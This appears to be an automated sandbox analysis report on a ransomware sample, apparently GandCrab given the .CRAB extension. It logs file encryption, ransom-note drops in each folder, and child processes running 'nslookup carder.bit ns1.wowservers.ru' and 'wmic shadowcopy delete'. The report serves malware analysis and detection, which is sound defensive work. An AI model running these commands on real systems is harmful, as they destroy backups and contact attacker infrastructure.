File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\DQQHJZ8C\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 1048576, size_out = 506 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 512 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 1048576, size_out = 200704 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 200704 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\System.mdw, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\System.mdw, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\System.mdw.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 1048576, size_out = 126976 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 126976 True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
For performance reasons, the remaining 4441 entries are omitted.
The remaining entries can be found in glog.xml.
Process #6: nslookup.exe
8 18
»
Information Value
ID #6
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:24, Reason: Child Process
Unmonitor End Time: 00:02:31, Reason: Terminated by Timeout
Monitor Duration 00:01:07
OS Process Information
»
Information Value
PID 0x950
Parent PID 0xef8 (c:\users\ciihmn~1\appdata\local\temp\busmeat.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 790
0x 244
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x00000000001f0000 0x001f0000 0x0020ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001fffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x00203fff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x00211fff Private Memory Readable, Writable True False False -
nslookup.exe.mui 0x00210000 0x00214fff Memory Mapped File Readable False False False -
pagefile_0x0000000000220000 0x00220000 0x00233fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000240000 0x00240000 0x00243fff Pagefile Backed Memory Readable True False False -
nslookup.exe 0x00250000 0x00266fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000270000 0x00270000 0x0426ffff Pagefile Backed Memory - True False False -
private_0x0000000004270000 0x04270000 0x042affff Private Memory Readable, Writable True False False -
private_0x00000000042b0000 0x042b0000 0x042effff Private Memory Readable, Writable True False False -
pagefile_0x00000000042f0000 0x042f0000 0x042f0fff Pagefile Backed Memory Readable True False False -
private_0x0000000004300000 0x04300000 0x04301fff Private Memory Readable, Writable True False False -
private_0x0000000004310000 0x04310000 0x04310fff Private Memory Readable, Writable True False False -
private_0x0000000004320000 0x04320000 0x0441ffff Private Memory Readable, Writable True False False -
private_0x0000000004420000 0x04420000 0x0445ffff Private Memory Readable, Writable True False False -
private_0x0000000004460000 0x04460000 0x04460fff Private Memory Readable, Writable True False False -
private_0x0000000004470000 0x04470000 0x0447ffff Private Memory Readable, Writable True False False -
locale.nls 0x04480000 0x0453dfff Memory Mapped File Readable False False False -
private_0x0000000004540000 0x04540000 0x0457ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004580000 0x04580000 0x04707fff Pagefile Backed Memory Readable True False False -
imm32.dll 0x04710000 0x04739fff Memory Mapped File Readable False False False -
private_0x0000000004710000 0x04710000 0x04713fff Private Memory Readable, Writable True False False -
private_0x0000000004770000 0x04770000 0x0477ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004780000 0x04780000 0x04900fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004910000 0x04910000 0x05d0ffff Pagefile Backed Memory Readable True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73ed0000 0x73edafff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73ee0000 0x73ef2fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73f00000 0x73f15fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x73f20000 0x73f31fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74150000 0x74195fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x741a0000 0x741a7fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74310000 0x74393fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x743a0000 0x743edfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x744a0000 0x744a7fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x744b0000 0x744dffff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x74b10000 0x74b2afff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74ce0000 0x74d38fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74d40000 0x74d49fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74d50000 0x74d6dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74d70000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76ca0000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76f70000 0x7708ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x77250000 0x77292fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x775e0000 0x7760afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x77930000 0x7798bfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77ad0000 0x77ad6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77af0000 0x77b9bfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007e2e0000 0x7e2e0000 0x7e3dffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007e3e0000 0x7e3e0000 0x7e402fff Pagefile Backed Memory Readable True False False -
private_0x000000007e403000 0x7e403000 0x7e403fff Private Memory Readable, Writable True False False -
private_0x000000007e407000 0x7e407000 0x7e409fff Private Memory Readable, Writable True False False -
private_0x000000007e40a000 0x7e40a000 0x7e40cfff Private Memory Readable, Writable True False False -
private_0x000000007e40d000 0x7e40d000 0x7e40dfff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc03e6ffff Private Memory Readable True False False -
pagefile_0x00007dfc03e70000 0x7dfc03e70000 0x7ffc03e6ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
Threads
Thread 0x790
8 18
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x250000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 94.249.60.127, 189.75.183.21, 94.183.71.48 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 570 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #8: nslookup.exe
8 18
»
Information Value
ID #8
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:17, Reason: Child Process
Unmonitor End Time: 00:02:31, Reason: Terminated by Timeout
Monitor Duration 00:00:14
OS Process Information
»
Information Value
PID 0xb10
Parent PID 0xef8 (c:\users\ciihmn~1\appdata\local\temp\busmeat.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x B1C
0x 9CC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
nslookup.exe 0x00250000 0x00266fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000640000 0x00640000 0x0463ffff Pagefile Backed Memory - True False False -
private_0x0000000004640000 0x04640000 0x0465ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004640000 0x04640000 0x0464ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000004650000 0x04650000 0x04653fff Private Memory Readable, Writable True False False -
private_0x0000000004660000 0x04660000 0x04661fff Private Memory Readable, Writable True False False -
nslookup.exe.mui 0x04660000 0x04664fff Memory Mapped File Readable False False False -
pagefile_0x0000000004670000 0x04670000 0x04683fff Pagefile Backed Memory Readable True False False -
private_0x0000000004690000 0x04690000 0x046cffff Private Memory Readable, Writable True False False -
private_0x00000000046d0000 0x046d0000 0x0470ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004710000 0x04710000 0x04713fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004720000 0x04720000 0x04720fff Pagefile Backed Memory Readable True False False -
private_0x0000000004730000 0x04730000 0x04731fff Private Memory Readable, Writable True False False -
private_0x0000000004740000 0x04740000 0x0477ffff Private Memory Readable, Writable True False False -
imm32.dll 0x04780000 0x047a9fff Memory Mapped File Readable False False False -
private_0x0000000004780000 0x04780000 0x04780fff Private Memory Readable, Writable True False False -
private_0x0000000004790000 0x04790000 0x04790fff Private Memory Readable, Writable True False False -
private_0x00000000047a0000 0x047a0000 0x047a3fff Private Memory Readable, Writable True False False -
private_0x00000000047b0000 0x047b0000 0x047bffff Private Memory Readable, Writable True False False -
locale.nls 0x047c0000 0x0487dfff Memory Mapped File Readable False False False -
private_0x0000000004880000 0x04880000 0x048bffff Private Memory Readable, Writable True False False -
private_0x00000000048d0000 0x048d0000 0x049cffff Private Memory Readable, Writable True False False -
private_0x0000000004a80000 0x04a80000 0x04a8ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004a90000 0x04a90000 0x04c17fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004c20000 0x04c20000 0x04da0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004db0000 0x04db0000 0x061affff Pagefile Backed Memory Readable True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73ed0000 0x73edafff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73ee0000 0x73ef2fff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x73f00000 0x73f15fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x73f20000 0x73f31fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74150000 0x74195fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x741a0000 0x741a7fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74310000 0x74393fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x743a0000 0x743edfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x744a0000 0x744a7fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x744b0000 0x744dffff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x74b10000 0x74b2afff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74ce0000 0x74d38fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74d40000 0x74d49fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74d50000 0x74d6dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74d70000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76ca0000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76f70000 0x7708ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x77250000 0x77292fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x775e0000 0x7760afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x77930000 0x7798bfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77ad0000 0x77ad6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77af0000 0x77b9bfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007f3f0000 0x7f3f0000 0x7f4effff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007f4f0000 0x7f4f0000 0x7f512fff Pagefile Backed Memory Readable True False False -
private_0x000000007f518000 0x7f518000 0x7f518fff Private Memory Readable, Writable True False False -
private_0x000000007f519000 0x7f519000 0x7f519fff Private Memory Readable, Writable True False False -
private_0x000000007f51a000 0x7f51a000 0x7f51cfff Private Memory Readable, Writable True False False -
private_0x000000007f51d000 0x7f51d000 0x7f51ffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc03e6ffff Private Memory Readable True False False -
pagefile_0x00007dfc03e70000 0x7dfc03e70000 0x7ffc03e6ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
Threads
Thread 0xb1c
8 18
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x250000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 94.249.60.127, 189.75.183.21, 94.183.71.48 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 44, size_out = 44 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 94.249.60.127, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 570 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #10: wmic.exe
12 0
»
Information Value
ID #10
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:23, Reason: Child Process
Unmonitor End Time: 00:02:31, Reason: Terminated by Timeout
Monitor Duration 00:00:08
OS Process Information
»
Information Value
PID 0xd0c
Parent PID 0xef8 (c:\users\ciihmn~1\appdata\local\temp\busmeat.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x D58
0x D04
0x D14
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000c60000 0x00c60000 0x00c7ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000c60000 0x00c60000 0x00c6ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000c70000 0x00c70000 0x00c73fff Private Memory Readable, Writable True False False -
private_0x0000000000c80000 0x00c80000 0x00c81fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000c80000 0x00c80000 0x00c80fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000c90000 0x00c90000 0x00ca3fff Pagefile Backed Memory Readable True False False -
private_0x0000000000cb0000 0x00cb0000 0x00ceffff Private Memory Readable, Writable True False False -
private_0x0000000000cf0000 0x00cf0000 0x00d2ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000d30000 0x00d30000 0x00d33fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000d40000 0x00d40000 0x00d40fff Pagefile Backed Memory Readable True False False -
private_0x0000000000d50000 0x00d50000 0x00d51fff Private Memory Readable, Writable True False False -
private_0x0000000000d60000 0x00d60000 0x00d9ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000da0000 0x00da0000 0x00da0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000db0000 0x00db0000 0x00dbffff Private Memory Readable, Writable True False False -
